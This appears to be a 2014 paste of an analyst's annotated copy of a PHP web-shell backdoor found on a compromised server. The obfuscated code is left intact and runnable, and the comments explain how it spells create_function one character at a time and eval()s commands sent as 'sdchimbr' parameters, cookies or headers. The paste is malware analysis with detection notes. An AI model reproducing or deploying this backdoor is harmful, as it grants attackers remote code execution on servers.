Yehonatan

HTTP_SDCHIMBR virus imgedit-icons_prevv1.php

Dec 31st, 2014
  1. <?php
  2. /**
  3. *
  4. * The virus was inside a file named imgedit-icons_prevv1.php
  5. * It was uploaded in an unknown way.
  6. * It is probably some kind of bot, because it takes its commands over HTTP.
  7. * It has infected functions.php with the following -
  8. * http://pastebin.com/npmhVNiN
  9. *
  10. * Translated by Yehonatan Tsirolnik
  11. *
  12. **/
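  13. // Virus dictionary: junk-named variables that each hold a few characters. The strings below are assembled by picking single characters out of them, and many of the variables are never referenced in the code below.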
  14. $caresser = 't';
  15. $cavernous = 't';
  16. $bomb = 'r';
  17. $denouement = '_';
  18. $atatwalker = 'Vl$O';
  19. $fading = '_';
  20. $cleat = 't"';
  21. $interferes = ';';
  22. $hoops = 'S';
  23. $longer = 'Q';
  24. $arthropods = '"())lm';
  25. $blustering = '[';
  26. $formalizing = 'rs';
  27. $diary = 't';
  28. $hurty = 'ag:)aa';
  29. $bartholemy = 's';
  30. $all = 'X';
  31. $lasttango = 'a';
  32. $archambault = 'Ir';
  33. $animal = 'Z';
  34. $arson = 'e($s';
  35. $fruitfulness = '$';
  36. $disposals = ')';
  37. $jamesy = 'm';
  38. $hieratic = '_';
  39. $coordinators = 'a"r_;re';
  40. $christoper = '$e bTpO';
  41. $evict = '4iBR';
  42. $anatomically = 'r';
  43. $darcy = '(';
  44. $lake = ';';
  45. $densest = 'v_';
  46. $far = '(';
  47. $indebted = 'R';
  48. $majesty = '"';
  49. $infest = '](ec';
  50. $cogent = 'YIe)ne';
  51. $creative = ']';
  52. $intimated = 'P';
  53. $fluffier = 'eH[sg$eB';
  54. $contemplates = '$u(';
  55. $disobeyed = '_[siou';
  56. $botanist = 'R';
  57. $carline = ')';
  58. $antenna = 'd';
  59. $aryn = 'R[Cr';
  60. $attributes = 'd';
  61. $alwyn = '(HTRiivi';
  62. $authenticity = 'b]Ur_S';
  63. $fiducial = 'sEc,Tf6';
  64. $lanna = 'bW';
  65. $ericka = 'I';
  66. $disowned = 'L';
  67. $hut = 'rcI"';
  68. $equipotent = ']';
  69. $blane = 'cv$eeT_U';
  70. $keenness = 'D';
  71. $fuselage = 'V"iTrvE$';
  72. $checkable = '_d^r';
  73. $examination = 'at$n"s';
  74. $looted = 'Ea(r?tf';
  75. $cool = '?"';
  76. $clam = 'ah)eJdd';
  77. $beribboned = 'm';
  78. $ashley = 'i';
  79. $directing = 'e';
  80. $falter = ')';
  81. $breadbox = 'Trag,';
  82. $initiator = '(';
  83. $brakeman = 'QE';
  84. $forth = 'i';
  85. $coneflower = 'e';
  86. $chow = 'h=HOns';
  87. $ciliate = 'yc';
  88. $fascist = 'io_D_Ms';
  89. $evidential = 'i';
  90. $depositor = ']';
  91. $franzen = '(';
  92. $maje = '(';
  93. $hydrochloric = 'M';
  94. $dispersive = 'SC';
  95. $devout = ':';
  96. $gourmet = 'Kce;ia=C[';
  97. $conferences = 'PtNHM$';
  98. $justifying = 'P';
  99. $escape = 'p';
  100. $delegating = ')';
  101. $engineer = ')';
  102. $legume = 'EsS)';
  103. $banjo = 'yK';
  104. $imagine = 'R';
  105. $cleanliness = 'S';
  106. $evita = '_eao';
  107.  
  108. // End of dictionary
  109.  
  110. // The line below spells "create_function" one character at a time, so the function name never appears as a literal in the file. create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so this file only runs on older PHP.
  111. $chilliness = $gourmet['1'] . $breadbox['1'] . $evita[1] . $evita['2'] . $conferences['1'] . $evita[1] . $evita['0'] . $looted[6] . $disobeyed['5'] . $chow[4] . $gourmet['1'] . $conferences['1'] . $gourmet['4'] . $evita['3'] . $chow[4];
  112.  
  113. // A single space (0x20); it is passed below as the first argument of create_function, i.e. the parameter-list string
  114. $litmus = $christoper['2'];
  115.  
  116. // The line below assembles its second string from the dictionary in the same way and is equivalent to -
  117. // $andria = create_function(" ", "eval(array_pop(func_get_args()));");
  118. // i.e. a lambda with no declared parameters that eval()s whatever is passed as its last argument
  119. $andria = $chilliness($litmus, $evita[1] . $fuselage['5'] . $evita['2'] . $arthropods['4'] . $maje . $evita['2'] . $breadbox['1'] . $breadbox['1'] . $evita['2'] . $banjo['0'] . $evita['0'] . $escape . $evita['3'] . $escape . $maje . $looted[6] . $disobeyed['5'] . $chow[4] . $gourmet['1'] . $evita['0'] . $breadbox['3'] . $evita[1] . $conferences['1'] . $evita['0'] . $evita['2'] . $breadbox['1'] . $breadbox['3'] . $legume[1] . $maje . $legume['3'] . $legume['3'] . $legume['3'] . $gourmet['3']);
  120.  
  121. // Call the lambda function
  122. // The arguments passed to the function are:
  123. //  E,Z,h,i,Z,[,I,],b,X,l,"$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["sdchimbr"])?$i["sdchimbr"]:(isset($i["HTTP_SDCHIMBR"])?$i["HTTP_SDCHIMBR"]:die);eval(strrev(base64_decode(strrev($a))));"
  124. //  But technically, because of the array_pop, only the last argument (the PHP code in quotes above) is eval'd; the single characters passed before it are never used
  125. //  The formatted PHP is -
  126. /*
  127. $i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
  128. $a = isset($i["sdchimbr"]) ? $i["sdchimbr"] : (isset($i["HTTP_SDCHIMBR"]) ? $i["HTTP_SDCHIMBR"] : die);
  129. eval(strrev(base64_decode(strrev($a))));
  130. */
  131. //  Which expands to the more readable form -
  132. /*
  133. $i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
  134.  
  135. if (isset($i["sdchimbr"])) {
  136.     $a = $i["sdchimbr"];
  137. }
  138. else {
  139.     if (isset($i["HTTP_SDCHIMBR"])) {
  140.         $a = $i["HTTP_SDCHIMBR"];
  141.     }
  142.     else {
  143.         die;
  144.     }
  145. }
  146.  
  147. eval(strrev(base64_decode(strrev($a))));
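  148. * So the call below executes the code above.
  149. * Detection: the command arrives in a request parameter or cookie named "sdchimbr", or in an HTTP request header that PHP exposes as $_SERVER["HTTP_SDCHIMBR"]; with neither present the script just dies, so a plain request to the file produces no output.
  150. * To read a captured value, apply the same steps the code does: reverse the string, base64-decode it, then reverse the result.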
  151. */
  152. $andria($legume[0], $animal, $chow['0'], $gourmet['4'], $animal, $gourmet['8'], $hut['2'], $depositor, $lanna['0'], $all, $arthropods['4'], $conferences[5] . $gourmet['4'] . $gourmet['6'] . $evita['2'] . $breadbox['1'] . $breadbox['1'] . $evita['2'] . $banjo['0'] . $evita['0'] . $beribboned . $evita[1] . $breadbox['1'] . $breadbox['3'] . $evita[1] . $maje . $conferences[5] . $evita['0'] . $imagine . $legume[0] . $brakeman['0'] . $blane[7] . $legume[0] . $cleanliness . $breadbox['0'] . $breadbox['4'] . $conferences[5] . $evita['0'] . $gourmet['7'] . $chow['3'] . $chow['3'] . $banjo['1'] . $hut['2'] . $legume[0] . $breadbox['4'] . $conferences[5] . $evita['0'] . $cleanliness . $legume[0] . $imagine . $fuselage[0] . $legume[0] . $imagine . $legume['3'] . $gourmet['3'] . $conferences[5] . $evita['2'] . $gourmet['6'] . $gourmet['4'] . $legume[1] . $legume[1] . $evita[1] . $conferences['1'] . $maje . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $legume[1] . $clam['6'] . $gourmet['1'] . $chow['0'] . $gourmet['4'] . $beribboned . $lanna['0'] . $breadbox['1'] . $cool['1'] . $depositor . $legume['3'] . $cool['0'] . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $legume[1] . $clam['6'] . $gourmet['1'] . $chow['0'] . $gourmet['4'] . $beribboned . $lanna['0'] . $breadbox['1'] . $cool['1'] . $depositor . $devout . $maje . $gourmet['4'] . $legume[1] . $legume[1] . $evita[1] . $conferences['1'] . $maje . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $conferences[3] . $breadbox['0'] . $breadbox['0'] . $justifying . $evita['0'] . $cleanliness . $fascist[3] . $gourmet['7'] . $conferences[3] . $hut['2'] . $conferences['4'] . $fluffier['7'] . $imagine . $cool['1'] . $depositor . $legume['3'] . $cool['0'] . $conferences[5] . $gourmet['4'] . $gourmet['8'] . $cool['1'] . $conferences[3] . $breadbox['0'] . $breadbox['0'] . $justifying . $evita['0'] . $cleanliness . $fascist[3] . $gourmet['7'] . $conferences[3] . $hut['2'] . 
$conferences['4'] . $fluffier['7'] . $imagine . $cool['1'] . $depositor . $devout . $clam['6'] . $gourmet['4'] . $evita[1] . $legume['3'] . $gourmet['3'] . $evita[1] . $fuselage['5'] . $evita['2'] . $arthropods['4'] . $maje . $legume[1] . $conferences['1'] . $breadbox['1'] . $breadbox['1'] . $evita[1] . $fuselage['5'] . $maje . $lanna['0'] . $evita['2'] . $legume[1] . $evita[1] . $fiducial['6'] . $evict[0] . $evita['0'] . $clam['6'] . $evita[1] . $gourmet['1'] . $evita['3'] . $clam['6'] . $evita[1] . $maje . $legume[1] . $conferences['1'] . $breadbox['1'] . $breadbox['1'] . $evita[1] . $fuselage['5'] . $maje . $conferences[5] . $evita['2'] . $legume['3'] . $legume['3'] . $legume['3'] . $legume['3'] . $gourmet['3']);